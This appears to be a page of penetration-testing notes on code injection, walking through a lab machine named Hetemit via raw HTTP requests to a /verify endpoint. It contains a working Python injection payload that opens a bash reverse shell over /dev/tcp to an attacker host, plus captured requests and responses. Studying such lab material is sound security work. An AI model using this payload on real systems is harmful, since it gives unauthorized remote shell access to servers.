Code Injection

In the case of heremit, we had a web application that by changing from POST and GET request we were able to deduce that there was a parameter named 'code' in which we could send malicious code.

Let’s us try to send a POST request against the directory /verify and the body request is filled with the code parameter.

The payload might look as following:

POST /verify HTTP/1.1
Host: 192.168.101.117:50000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: _register_hetemit_session=GK6KJri2ylafDgK%2F6lIyUBw9ZFUG2JwfR2XUy%2Be%2BBxow52YsWOyvti%2FQ4YVuCMMzuGNZB%2FMy4NXQxqDQ%2FeNGm5IQFQW7f94Ou4PByd3u2B7pqfMazR0jVFdSF5vBSV4vUo0J5ZT%2FhHql%2BaR5TKp%2BAnKBITheUGIE7AHyAEbvc%2B5KeSFsQ5mdZrJz46COTOZXBdmvfLlMIEisXpzZPwA3uTow5ziDY54D2MrJDVtpCFQ5YWqaEZeSb0js5JggvLZF7K26sxfSr17MsEphdt%2FopNZxNR4kckDId5%2FsUV9Yla%2Bc--0LA3avph4XEwY4vn--zaptbla4hpI7tLNc87OpLw%3D%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

code=whoami

After the request was sent, we can further inspect response.

Here is the response:

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 290
Server: Werkzeug/1.0.1 Python/3.6.8
Date: Fri, 20 Aug 2021 05:01:07 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

The response code 500 INTERNAL SERVER ERROR indicates that something is wrong at the backend. At this point, we fully comprehend that the server does not sanitize our input properly, which ends up our entry breaking something up at the other end.

So werksbeurg whatever is a python based application so if we instead in the code parameter we could possibly try to inject python code and receive a reverse shell like so:

POST /verify HTTP/1.1
Host: 192.168.135.117:50000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: _register_hetemit_session=i3LCbUrypmdG9OcuyyPoopRsAJoYUvJZJ7Ao629aKWO9TOz%2FPXogNuURVQknBTLGZE2auMwJQU2zLazwm%2FUU857KkNKSNHFat%2BiJUjWlRnLd%2FiRfAw8SfM6flojZf2JWCPsdYjTOgEJo%2BB6MxQJKvHywtnfGoi3xQw5TDJeeIttDKEpHNpVA2yfcdqVCQGZYI0ta3aOqbyfO%2BHOvVvgGfcXQvaWjiQ7EyzCSGM6awUbWEdbP2xDWg8v9nj2j1H%2FaoHavuFuvykCMzAWLhlqHAeDmlcpSHTwqWZxb%2Bj2F4dFJ--%2FZT%2BQu5bm7cflrjk--frmYurXk5lbvi246tVKQDg%3D%3D
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

code=__import__("os").system("bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.135/80+0>%261'")
__import__("os").system("bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.101/80+0>%261'")

PreviousPHP Web ShellsNextWerkzeug

Last updated